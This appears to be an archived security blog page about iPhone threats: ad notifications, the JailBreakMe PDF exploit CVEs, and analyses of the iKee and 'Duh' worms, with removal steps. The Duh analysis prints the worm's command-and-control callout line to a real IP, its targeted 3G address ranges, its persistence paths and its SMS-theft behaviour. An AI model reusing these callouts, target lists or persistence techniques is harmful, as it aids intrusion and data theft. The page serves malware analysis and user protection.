Archive

Archive for the ‘iPhone’ Category

Annoying ads coming from an iPad/iPhone app

I’ve recently encountered lots of annoying Ads in my iPhone and iPad. My initial impression is what an ‘Ad serving app’!  But, this is the result when you allow or agree to receive push notifications as shown below.

Here are some useful tips on how to deal with it. This instruction should stop the problem, otherwise the app causing your trouble is absolutely suspicious and you should report it for investigation.

How do I stop annoying Ads coming from an iPad/iPhone app?

1) Tap ‘Settings’ and look for ‘Notification’
2) It will display all application with Notification ‘turned on’, then tap the application that is bugging you with Ads.
3) Turn “OFF” Alerts, Badges and Sounds.

If the problem persist, you may want to consider to delete it.

How to delete application in iPad/iPhone?

1) Tap the target app, hold and wait until it starts to wiggle.
2) You’ll notice “X” button in the top right corner, which means you may tap it to delete.

Drag and Drop

This is unfortunate for business, and a worrying attack vector. The Mac App store was easily bypassed and cracked by this simple drag and drop process. Evidently, you’ll find it ‘Installed’ when you open the app.

Please be reminded that ‘deceptive packaging’ takes advantage of legitimate software and application packaging to obscure the possible execution of malicious code;  and, this provides attacker a good opportunity.

iOS Security Updates

iPod, iPhone and iPad users MUST immediately apply the security updates.

Visit Apple Security Updates for details.

Reference:

iPad http://support.apple.com/kb/HT4291;

iPhone and iPod http://support.apple.com/kb/HT4292

Why important?

This will protect you from in-the-wild drive-by download hack attack!

JailBreakMe by comex (et al.) demonstrated a serious security hole that allows users to jailbreak their iOS devices simply by just visiting a website and/or tapping a link. This security hole is very dangerous, by just browsing the web users could be exposed from abusive sites that may harvest their credentials and information.

How it work?

Safari browser loads a crafted PDF that exploits the following vulnerabilities:

First, it is triggered by unrecognized font, the Compact Font Format (CFFType 1C, which causes the second exploit code to execute. This vulnerability is referred as CVE-2010-1797.

<</Subtype /Type1C

Second, the value is too large for the integer data type to handle(refer example IOSurface property list below), resulting to execution of malicious code running as user to escalate to system or root privilege.

This vulnerability is referred as CVE-2010-2973.

So, an attacker entice a targeted user to open a URL. Upon opening the URL in Safari the PDF file will be automatically parsed and exploitation will occur. The file may also arrive as an email attachment.

Stay safe!

Recommended reading:

iPhone 4 / iPad: The Keys Out Of Prison by Axelle Apvrille

Technical Analysis on iPhone Jailbreaking by Matt Oh

Yet another glorified bad behavior

“The author of the first iPhone worm “iKee” has been given a job with Australian iPhone app developer Mogeneration” [Read SC]

We’ve heard similar story early this year when the author of Twitter worm “Mikkey” landed a job  at exqSoft Solutions.

“adolescents engage in bad behaviour because they find benefits — such as the immediate gratification of peer acceptance — are worth the risks.”  as published in journal Psychological Science.

This trend tends to justify that crimes in the public interest are not prosecuted but instead glorified?

Analysis of “Duh”

I just published the analysis of “Duh” also known as “iKee.b” – the latest iPhone worm. [read]

Propagation: It targets jailbroken iPhones with SSH enabled and attempt to remote login using the default iPhone password. “sshd” is responsible for scanning the network and it’s targeting pre-defined list of 3G providers in Australia, Netherlands,  Austria, Hungary and Portugal.

192.168.0.0-192.168.3.255
94.157.100.0-94.157.255.255
87.103.52.255-87.103.66.255
94.157.0.0.0-120.157.99.255
114.72.0.0-114.75.255.255
92.248.90.0-92.248.120.255
81.217.74.0-81.217.74.255
84.224.60.0-84.224.80.255
188.88.100.0-188.88.160.255
77.248.140.0-77.248.146.255
77.54.160.0-77.54.190.255
80.57.116.0-80.57.131.255
84.224.0.0-84.224.63.255

• Installation: It creates /private/var/mobile/home directory, drops “cydia.tgz” and extracts the following content:

syslog – This is a reporting bot, which runs every 5 minutes through a launchd job.  It’s a shell script which will perform the following:

• Establish remote server communication through its own http communicator “duh”

/private/var/mobile/home/duh 92.61.38.16 /xml/p.php?id=$ID

• The remote server is expected to reply where the worm will attempt to store this as a temporary file /private/var/mobile/home/.tmp
• It will mark the communication 1 if it is the first time, otherwise it’s 2.
• It then adds this information to the temporary file and saves it as /private/var/mobile/home/heh, where it will execute it as a shell script.

inst –  A malicious shell script used to install the worm. This is executed after the content of cydia.tgz is extracted.

• It checks for infection marker, to avoid re-installation. This is necessary because the worm will continuously run in background based on the launchd jobs.
• Create ID that will be used to pass communication to the master server.
• Install legitimate packages that will be used to gather and steal information
• Modify root password
• Gather important information such as iPhone OS version and SMS Message Database (sms.db).
• Compress gathered information to this format {ID}.tgz
• Establish a communication to remote server and reports back the stolen information in a base64 encoded format.

duh – This is an iPhone executable file responsible for the Worm’s bot http communication. This is where the malware name “Duh” was derived.

**Updated 11/12/2009:  A good analysis was recently published @ Fortinet’s blog. As I mentioned this worm is similar to OSX Jahlav and DNSChanger, in which the group behind mostly copy exact source code (around the internet) and uses it for their own advantage.  In this case,  Fortinet researcher found that “duh” code is similar to “htmlget.c”, which can be easily found over the internet and it is indeed  NOT malicious by itself.

I absolutely agree in this findings, however similar to “NC” (netcat utility), it could be use for good but in this specific case of the iPhone worm package, it was used to do evil 😉

curl_7.19.4-6_iphoneos_arm.deb – This is a legitimate package of Curl for iPhone, used by this worm to install the following packages:
• adv-cmds_119-5_iphoneos-arm.deb
• sqlite3_3.5.9-9_iphoneos-arm.deb

com.apple.period.plist – This is a launchd job which will execute the worm’s bot “syslog” every 5 minutes.

• Startup Entries: The worm uses LaunchDaemon to run a shell script on a specific time interval:
/System/Library/LaunchDaemons/com.apple.periodic.plist launch /private/var/mobile/home/syslog every 2000 sec. (~ 33 minutes)
/System/Library/LaunchDaemons/com.apple.period.plist launch /private/var/mobile/home/syslog every 300 sec. (5 minutes)
/System/Library/LaunchDaemons/com.apple.ksyslog.plist launch /private/var/mobile/home/sshd using “RunAtLoad” and “KeepAlive” key for continuous running.

New iPhone Worm

Mikko of F-Secure blogged about a new iPhone worm that is similar to iKee, only this time, it has a reporting bot capability communicating to a web-based C&C.

This has been confirmed by xs4all.

Further reading – Malicious iPhone Worm.

iPhone worm “iKee”

Name: Worm iKee

Author: ike_x

Location: Sydney, Australia

Discovered: November 6, 2009 – Friday at 12:15 pm by sierralpha @ whirlpool forum

Report details: 3GS 16gb
Os 3.1.2 (7D11) on OPTUS
Jailbroken with Blackra1n
Running Cydia, Winterboard and Installous

Description:

Worm iKee targets jailbroken iPhones and takes advantage of SSH service that uses default password to allow remote user logins.

From an interview by JD, the author explains:

As for users that are infected, there are two common denominator – They all have hacked iPhones

(known to the hacking community as “JailBroken”, and they all use an SSH Daemon, allowing users

to connect to their phone’s remotely, and attempt to login.

Worm Propagation Method: SSH service using default password

Author recommendation:

Users that have already “JailBroken” their iPhones, should immediately change the root account password, even if they have not installed an SSH Daemon.

Worm Behaviour:

– iKee overwrites Cydia files with its working code

“Cydia is a replacement packaging and repository manager for the original Installer.app for the iPhone or iPod touch”

– Changes iPhone owners’ wallpaper and replaces it with a photo that is known from a cross platform joke “RICKROLL” (I remember, I captured a video and uploaded in YouTube)  “Never Gonna Give You Up” by Rick Astley.

– Deletes SSH Daemon

– It scan pre-defined IP addresses to infect and spread to another vulnerable iPhone user (All

IP addresses belong to 3G customers in Australia and are hardcoded in the worm by SANS diary)

ikee-iphone-wallpaper.jpgImage source: forums.whirlpool.net.au “iKee changes infected iPhone user’s wallpaper”

How to remove iKee:

The author explained (from JD’s interview) that there are 4 variants of this worm, and here’s how to remove them:

Variants A-C store files in these directories, so you have to remove them (may use rm in terminal)

/bin/poc-bbot

/bin/sshpass

/var/log/youcanbeclosertogod.jpg

/var/mobile/LockBackground.jpg

/System/Library/LaunchDaemons/com.ikey.bbot.plis

/var/lock/bbot.lock

Then, reboot the phone and change your password and re-install SSH.

For variant D, remove the following files in these directories:

/usr/libexec/cydia/startup

/usr/libexec/cydia/startup.so

/usr/libexec/cydia/startup-helper

/System/Library/LaunchDaemons/com.saurik.Cydia.Startup.plist

Reinstall Cydia.

Remember to change your root password!

Follow this instruction.